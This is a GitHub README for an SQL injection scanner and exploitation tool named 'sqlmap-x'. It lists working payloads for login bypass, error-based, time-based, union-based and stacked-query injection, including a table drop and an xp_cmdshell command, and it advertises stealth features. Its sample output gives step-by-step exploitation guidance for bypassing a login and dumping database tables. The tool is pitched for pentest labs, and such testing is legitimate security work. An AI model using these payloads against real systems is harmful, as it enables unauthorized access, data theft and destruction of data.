by R0b3rt0 (Robert Mwatua) | 🛡️ Professional Security Assessment Tool
🚀 A professional-grade, multi-threaded SQL injection detection framework that thinks like a real attacker. Features WAF detection, crawling, GET/POST injection, login bypass testing, and comprehensive reporting with attacker-style exploitation guidance.
Compatible with: DVWA · WebGoat · HackTheBox · TryHackMe · VulnBank · bWAPP · PentesterLab
| Category | Capabilities |
|---|---|
| 🧠 Detection Methods | Error-based, Boolean-based, Time-based, Union-based, Login Bypass, Stacked Queries, Second-Order |
| 🕷️ Discovery | Web crawling (depth 1-3), Form auto-detection, GET parameter extraction |
| 🛡️ WAF Detection | Cloudflare, ModSecurity, AWS WAF, Akamai, Imperva, Sucuri, Barracuda, F5, Wordfence, Fortinet |
| 🔄 Performance | Multi-threaded (1-10 threads), Configurable delays, User-Agent rotation |
| 📊 Reporting | JSON + HTML reports, Severity scoring (CRITICAL/HIGH/MEDIUM), Exploitation guidance |
| 🎯 Login Bypass | 25+ authentication bypass payloads (admin' --, OR 1=1, UNION bypass, etc.) |
| 🔐 Stealth | Random delays, Proxy support, Custom headers, Auth tokens |
# 1. Clone the repository
git clone https://github.com/Robertmwatua/sqlmap-x.git
cd sqlmap-x
# 2. Create virtual environment (recommended)
python3 -m venv sqlmap_env
source sqlmap_env/bin/activate # On Windows: sqlmap_env\Scripts\activate
# 3. Install dependencies
pip install -r requirements.txt
# 4. Run the tool
python sqli_detector.py
🚀 Quick Start
bash
# Interactive wizard (recommended)
python sqli_detector.py
# Example target: OWASP DVWA
# Enter: http://localhost:8080/vulnerabilities/sqli/
# Crawl: y | Depth: 2 | Threads: 3 | Delay: 0.2
🎯 Detection Capabilities
1. Authentication Bypass (CRITICAL)
sql
admin' --
admin' #
' OR '1'='1
admin' OR 1=1--
' UNION SELECT NULL--
2. Error-Based SQLi (HIGH)
sql
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
' AND 1=CONVERT(int,@@version)--
' AND 1=TO_NUMBER(''')--
3. Time-Based Blind SQLi (HIGH)
sql
' OR SLEEP(5)--
' AND IF(1=1,SLEEP(3),0)--
'; WAITFOR DELAY '00:00:05'--
4. Union-Based SQLi (CRITICAL)
sql
' UNION SELECT NULL--
' UNION SELECT @@version,database()--
' UNION SELECT user(),NULL,NULL--
5. Boolean-Based Blind SQLi (MEDIUM)
sql
' AND 1=1--
' AND 1=2--
' OR '1'='1
6. Stacked Queries (HIGH)
sql
'; DROP TABLE users--
'; SELECT SLEEP(3)--
'; EXEC xp_cmdshell('whoami')--
sqlmap-x/
├── 🐍 sqli_detector.py # Main tool (2000+ lines)
├── 📦 requirements.txt # Dependencies
├── 📖 README.md # Documentation
├── 📂 reports/ # Generated reports
│ ├── sqli_*.json # JSON findings
│ └── sqli_*.html # HTML report with guidance
└── ⚖️ LICENSE # MIT License
┌─[ STEP 1 ]─ INITIALIZING ──────────────────────────────────────
✔ HTTP client ready
└────────────────────────────────────────────────────────────────
┌─[ STEP 2 ]─ WAF DETECTION ─────────────────────────────────────
✔ No WAF signatures detected
└────────────────────────────────────────────────────────────────
┌─[ STEP 3 ]─ DISCOVERY ─────────────────────────────────────────
✔ Crawled 12 page(s)
✔ Forms: 3 │ GET params: 8
└────────────────────────────────────────────────────────────────
┌─[ STEP 4 ]─ INJECTION TESTING ─────────────────────────────────
» Testing form POST https://target.com/login
⚡ [CRITICAL] Authentication Bypass | field=username+password
⚡ [HIGH] Error-Based SQLi | field=username
» Testing GET param [id] https://target.com/page?id=1
⚡ [HIGH] Union-Based SQLi (GET) | field=id
└────────────────────────────────────────────────────────────────
┌─[ STEP 5 ]─ REPORTS ───────────────────────────────────────────
✔ JSON → reports/sqli_20260413_143022.json
✔ HTML → reports/sqli_20260413_143022.html
└────────────────────────────────────────────────────────────────
╔══════════════════════════════════════════════════════════════╗
║ NEXT STEPS & EXPLOITATION GUIDANCE ║
╚══════════════════════════════════════════════════════════════╝
① LOGIN BYPASS CONFIRMED
┌─ Go to: https://target.com/login
│ In the username field enter:
│ admin' --
│ In the password field enter:
│ anything
│ Hit login — you should be authenticated as admin.
② UNION-BASED: DATA EXTRACTION
│ Confirmed column count: 2
│ Dump all tables:
│ id=' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables--
══════════════════════════════════════════════════════════════════
SCAN COMPLETE
══════════════════════════════════════════════════════════════════
CRITICAL: 1
HIGH: 2
Total : 3
Forms : 3
GET params: 8
Duration : 45.23s
══════════════════════════════════════════════════════════════════